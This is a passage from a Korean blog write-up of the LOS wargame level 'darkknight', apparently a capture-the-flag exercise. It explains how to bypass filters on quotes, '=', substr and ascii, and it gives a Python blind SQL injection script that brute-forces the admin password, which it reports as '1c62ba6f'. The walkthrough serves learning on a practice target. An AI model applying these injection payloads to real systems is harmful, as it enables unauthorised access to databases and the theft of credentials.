[LOS] prob_darkknight

LOS 12번 문제인 darkknight이다!!

오, 검은색 박스를 입히니 조금 더 깔끔해보인다!

---

음, 이번 문제는 조금 더 까다로워 보인다. 이것도 Blind SQL Injection으로 보인다!!

필터링 하는 것은' (single quote)와 =(equals) 그리고 substr, ascii 문자열 필터링하는 것으로 보인다.

흠

싱글  쿼트는 괄호나 더블 쿼트를 사용해주면 될 것 같고

이퀄은 like를 사용해주면 될 것 같다.

substr은 이전 문제처럼 mid 함수를 사용하고

ascii는 ord함수를 사용해볼 것이다!

---

이번엔 pw에 값을 넣지 않을 것이다.

풀어보면 알겠지만 저 쿼트를 닫아주는게 조금 까다롭다. 그러니 그냥 no에 보내보자~!

일단 길이를 구해보았다.

기분탓인진 모르겠지만 여기까지 풀면서 느낀게 비밀번호의 길이가 모두 8이다..

그래서 무의식적으로 8부터 넣어본다.

이것도 쉽게 구했다. 굳이 주석을 사용해서 끝을 맺을 필요는 없는 걸 알 수 있다.

---

글씨가 좀 작아졌다.

ord 도 ascii와 마찬가지로 ascii 값을 반환한다.

그래서 첫번째 자리는 ascii 값 49인것으로 숫자 1이다!!

이것도 손으로 다 하면 시간이 상당히 오래 걸리므로 스크립트를 사용했다.

---

import requests, string cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') pw = '' for i in range(1, 9): for strings in string.digits + string.ascii_letters: url = 'https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no=1 or id like "admin" %26%26 ord(mid(pw, ' + str(i) + ', 1)) like ' + str(ord(strings)) req = requests.get(url, cookies = cookie) if req.text.find("<h2>Hello admin</h2>") > 0: pw += strings print(pw) break

패스워드를 구했다! '1c62ba6f'